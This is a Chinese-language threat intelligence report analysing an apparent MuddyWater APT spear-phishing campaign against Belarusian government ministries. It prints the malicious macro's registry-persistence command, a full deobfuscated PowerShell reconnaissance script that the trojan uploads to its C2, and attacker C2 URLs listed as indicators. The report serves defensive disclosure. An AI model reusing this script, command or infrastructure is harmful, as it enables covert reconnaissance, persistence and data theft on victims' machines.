疑似污水(MuddyWater)APT组织针对白俄罗斯国防部、外交部等机构的定向攻击活动分析

2019-01-16 20:39:49
近期,腾讯御见威胁情报中心再次监测到了该APT组织的最新攻击行动,主要针对包括白俄罗斯的国防部、外交部在内的多个目标和国家进行了攻击。

一、概述

污水(MuddyWaterAPT组织是一个疑似来自伊朗的攻击组织,该组织主要针对中东地区、前苏联国家、土耳其等国家的政府部门进行攻击。该组织是目前全球最活跃的的APT攻击组织之一,2018年该组织进行了多轮的攻击活动,腾讯御见威胁情报中心也多次披露了该组织的攻击活动。

近期,腾讯御见威胁情报中心再次监测到了该APT组织的最新攻击行动,主要针对包括白俄罗斯的国防部、外交部在内的多个目标和国家进行了攻击。

二、 技术分析

1、 攻击方式

本次攻击依然采用使用最为常见以及攻击成本最低的攻击方式鱼叉攻击方式,如针对白俄罗斯外交部和国防部的相关人员发送钓鱼邮件:

2、 诱饵文件

诱饵文件均为带宏的word文档,如下:




可以看到,诱饵文件还是秉承了MuddyWater一贯的作风,采用模糊显示以及宏的方式。

3、 宏分析

多个诱饵文档的宏代码基本类似,如:



可以看到,函数名基本都是随机混淆的,代码流程也基本一致。不过在处理细节上稍有区别。

如某一版本,运行宏后,触发AutoOpen()函数,调用函数触发内置窗体代码:


窗体代码主要是将文本框中的字符串解密写入到”%temp%”目录下创建的in.reg文件中:


随后继续将硬编码在VBA中的字符串解密,并写入到”%temp%”目录下创建的GoogleUpdate.exe文件中:



最后调用MsgBox进行弹窗,并且无论受害者点击确定还是取消都会执行相同的代码。代码的作用是执行以下指令:

cmd.exe"/k %Windir%\System32\reg.exe IMPORT %temp%\in.reg


利用reg.exe导入释放的in.reg,实现开机启动释放在同一目录下的GoogleUpdate.exe


而另一个版本,则会在 “C:\Users\Public”下释放Data.zipTemp_rt_32.exe两个文件:


不过,依旧会调用MsgBox进行弹框并且无论点击确定还是取消都会执行Temp_rt_32.exe,该程序会解压Data.zip到当前目录下,并执行以下命令:

reg.exe IMPORT C:\Users\Public\UP.txt


4、 GoogleUpdate.exe分析

GoogleUpdate.exe为通过EnigmaVirtual Box打包。对其进行解包,解包后内容如下:



对解包的GoogleUpdate_uppacked.exe进行分析如下。

首先会去读取”temp_gh_12.dat”中的字符串解密,解密方式如下:base64解码加密字符串后与内置key进行异或,异或后的字符串再经过一次base解码即可得到原始字符串(加密方式相同):


获取地址,通过访问地址获取下一步通信地址:


https://www.jsonstore.io/4de4d6d84d17638b3cd0eaf18857784aff27501be7d3dd89fad2b7ac2134f52e


随后对读取到的c2地址进行通讯测试,获取返回值对比内置硬编码字符串确定是否是通信C2。如果C2正确则收集本地机器信息并加密处理写入临时文件,然后再上传到C2服务器上,如果上传成功则删除临时文件:


随后对内置硬编码的字符串进行解密:


解码后的内容为:

function g-user{$wrtagbsdcaxzxz = [ADSI]"WinNT://$env:COMPUTERNAME";$wrtagbsdcaxzxz.Children | where {$_.SchemaClassName -eq \'user\'} | Foreach-Object {$groups = $_.Groups() | Foreach-Object {$_.GetType().InvokeMember("Name", \'GetProperty\', $null, $_, $null)};$_ | Select-Object @{n=\'UserName\';e={$_.Name}},@{n=\'Groups\';e={$groups -join \';\'}}}}function Get-Information {[CmdletBinding()]Param ()function registry_values($regkey, $regvalue,$child){if ($child -eq "no"){$key = get-item $regkey}else{$key = get-childitem $regkey}$key | ForEach-Object {$values = Get-ItemProperty $_.PSPath; ForEach ($value in $_.Property) { if ($regvalue -eq "all") {$values.$value} elseif ($regvalue -eq "allname"){$value} else {$values.$regvalue;break}}}}$output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares" "all" "no")  -join "`r`n");$output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment" "all" "no")  -join "`r`n");$output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" "displayname")  -join "`r`n") ;$output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\" "all" "no")  -join "`r`n") ;$output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n");$output}g-user;Get-Information;ipconfig /all

执行这段脚本,并将执行后获取的执行结果保存为后缀名为.frk的临时文件。然后进行上传:



随后开启循环不断访问C2服务器获取下一步指令,木马支持的指令有两种,UploadDownload


分别进行上传和下载的功能。

三、关联分析

1、 MuddyWater的关系

本次攻击,从TTPs上来看跟MuddyWater组织之前的攻击方式比较相似,如下:

1) 诱饵文档的内容和样式跟之前的攻击类似:采用模糊化图片方式、相关的启用宏的提示、内容为简历以及官方文档等;

如曾经的攻击诱饵文档:MyCv.doc5935522717aee842433a5de9d228a715


2) 都使用宏的方式来实现载荷的加载;

3) 执行宏后,均有相关的弹框错误提示,但无论释放点击,都会继续执行后面的动作;

如之前的某一诱饵:shakva-lb.doc0cf25597343240f88358c694d7ae7e0a


4) 攻击目标:该次攻击的目标主要是白俄罗斯的国防部、外交部等,也跟之前MuddyWater的攻击目标相吻合。

综上我们判断,该攻击疑似MuddyWater APT组织发起的攻击活动。当然该次攻击并未使用MuddyWater最擅长的powershell木马POWERSTATS,而是采用C#的木马进行攻击。

2、 相关攻击者信息

隐藏在诱饵文档中的作者信息:


而该名字跟发邮件者的名字一致:

文档作者和发件者为VMP公司的专家和合伙人?

而该公司为白俄罗斯一家领先的著名的律师公司:

不过,从邮件的日志看,由于收件的邮箱服务器开启了spf验证,因此该邮件被移到了垃圾邮件里:


因此我们猜测发送者使用了伪造邮箱的发送进行钓鱼邮件的投递。而诱饵文档也做足了手脚。

四、总结

污水(MuddyWaterAPT 组织是近几年来全球最活跃的攻击组织之一,该组织喜欢使用模糊图形的诱饵文档和宏进行对政府等部门进行攻击活动。而从攻击武器库上,除了最为常用的powershell木马外,还使用了C++C#等其他的攻击工具。

此外,鱼叉攻击、宏代码等传统的攻击方式依然是最有效、使用最广泛的攻击方式,因此相关部门和单位切不可掉以轻心。因为APT攻击不会因为被曝光而停止,只要攻击目标有价值,APT攻击组织必然会持续的对目标进行攻击,直到达成目的。

五、安全建议

1、 提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码。

2、 使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯御点终端安全管理系统。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险;

3、 使用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统:

附录

IOCs

MD5

44284b5eb3b6da8c988924907478adbd

85b3f269251d805d3e2f78d37aeb1744

8899c0dac9f6bb73ce750ae7b3250dbd

f589af2ae8f1ace804ef5745feeb6d5c

d4259eb8e3b90ac08c9337df84468e87

1dae271ffc1841009104521e9c37e993

URL

https://www.jsonstore.io/4de4d6d84d17638b3cd0eaf18857784aff27501be7d3dd89fad2b7ac2134f52e

http://shopcloths.ddns.net/users.php

http://getgooogle.hopto.org/users.php
参考链接

1)    https://securelist.com/muddywater/88059/

2)    https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

最新资讯